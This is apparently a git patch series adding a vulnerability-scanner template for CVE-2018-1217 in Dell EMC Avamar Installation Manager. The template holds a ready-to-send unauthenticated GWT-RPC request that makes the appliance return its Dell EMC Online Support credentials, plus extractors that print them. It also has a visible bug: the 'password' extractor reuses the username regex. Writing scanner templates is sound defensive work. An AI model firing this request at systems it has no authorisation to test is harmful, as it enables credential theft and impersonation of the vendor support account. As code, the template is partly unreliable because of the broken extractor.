From 2fe61c41998e660cdb366a469878c9123cc7ccb3 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Mon, 29 Sep 2025 00:59:15 +0700 Subject: [PATCH 1/3] Add CVE-2018-1217 (vKEV) --- http/cves/2018/CVE-2018-1217.yaml | 61 +++++++++++++++++++++++++++++++ 1 file changed, 61 insertions(+) create mode 100644 http/cves/2018/CVE-2018-1217.yaml diff --git a/http/cves/2018/CVE-2018-1217.yaml b/http/cves/2018/CVE-2018-1217.yaml new file mode 100644 index 000000000000..81b8b8018218 --- /dev/null +++ b/http/cves/2018/CVE-2018-1217.yaml @@ -0,0 +1,61 @@ +id: CVE-2018-1217 + +info: + name: Dell EMC Avamar and Integrated Data Protection Appliance Installation Manager - Invalid Access Control + author: daffainfo + severity: critical + description: | + Avamar Installation Manager in Dell EMC Avamar Server 7.3.1, 7.4.1, and 7.5.0, and Dell EMC Integrated Data Protection Appliance 2.0 and 2.1, is affected by a missing access control check vulnerability which could potentially allow a remote unauthenticated attacker to read or change the Local Download Service (LDLS) credentials. The LDLS credentials are used to connect to Dell EMC Online Support. If the LDLS configuration was changed to an invalid configuration, then Avamar Installation Manager may not be able to connect to Dell EMC Online Support web site successfully. The remote unauthenticated attacker can also read and use the credentials to login to Dell EMC Online Support, impersonating the AVI service actions using those credentials. + reference: + - https://www.exploit-db.com/exploits/44441 + - https://nvd.nist.gov/vuln/detail/CVE-2018-1217 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2018-1217 + cwe-id: CWE-862 + cpe: cpe:2.3:a:dell:emc_avamar:*:*:*:*:*:*:*:*, cpe:2.3:a:dell:emc_integrated_data_protection_appliance:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: dell + product: emc_avamar,emc_integrated_data_protection_appliance + shodan-query: title:"AVAMAR" + tags: cve,cve2018,dell,avamar,vkev + +http: + - raw: + - | + POST /avi/avigui/avigwt HTTP/1.1 + Host: {{Hostname}} + X-Gwt-Permutation: {{randstr}} + X-Gwt-Module-Base: https://{{Hostname}}/avi/avigui/ + Content-Type: text/x-gwt-rpc; charset=UTF-8 + + 7|0|6|https://{{Hostname}}/avi/avigui/|60AF6BC6976F9B1F05AC454813F5324D|com.avamar.avinstaller.gwt.shared.AvinstallerService|getLDLSConfig|java.lang.String/2004016611|{{Hostname}}|1|2|3|4|2|5|5|6|0| + + matchers: + - type: dsl + dsl: + - 'contains_all(body, "//OK", "emcsupportUsername", "emcsupportPassword")' + - 'status_code == 200' + condition: and + + extractors: + - type: regex + name: username + group: 1 + internal: true + regex: + - 'emcsupportUsername\\":\\"(.*?)\\"' + + - type: regex + name: password + group: 1 + internal: true + regex: + - 'emcsupportUsername\\":\\"(.*?)\\"' + + - type: dsl + dsl: + - '"Username: " + username + ". Password: " + password' From 1c453bebde6a4654e64c4bc266b3d71554a07020 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Mon, 29 Sep 2025 23:45:16 +0530 Subject: [PATCH 2/3] Update CVE-2018-1217.yaml --- http/cves/2018/CVE-2018-1217.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2018/CVE-2018-1217.yaml b/http/cves/2018/CVE-2018-1217.yaml index 81b8b8018218..a08cd7b663f8 100644 --- a/http/cves/2018/CVE-2018-1217.yaml +++ b/http/cves/2018/CVE-2018-1217.yaml @@ -21,7 +21,7 @@ info: vendor: dell product: emc_avamar,emc_integrated_data_protection_appliance shodan-query: title:"AVAMAR" - tags: cve,cve2018,dell,avamar,vkev + tags: cve,cve2018,dell,avamar,kev,vkev http: - raw: From 7a4f8779cadd8b61f5dd47b60d79c80dee3bfb70 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Mon, 29 Sep 2025 23:50:02 +0530 Subject: [PATCH 3/3] Update CVE-2018-1217.yaml --- http/cves/2018/CVE-2018-1217.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2018/CVE-2018-1217.yaml b/http/cves/2018/CVE-2018-1217.yaml index a08cd7b663f8..243bb2bd73d6 100644 --- a/http/cves/2018/CVE-2018-1217.yaml +++ b/http/cves/2018/CVE-2018-1217.yaml @@ -58,4 +58,4 @@ http: - type: dsl dsl: - - '"Username: " + username + ". Password: " + password' + - '"Username: " + username + " Password: " + password'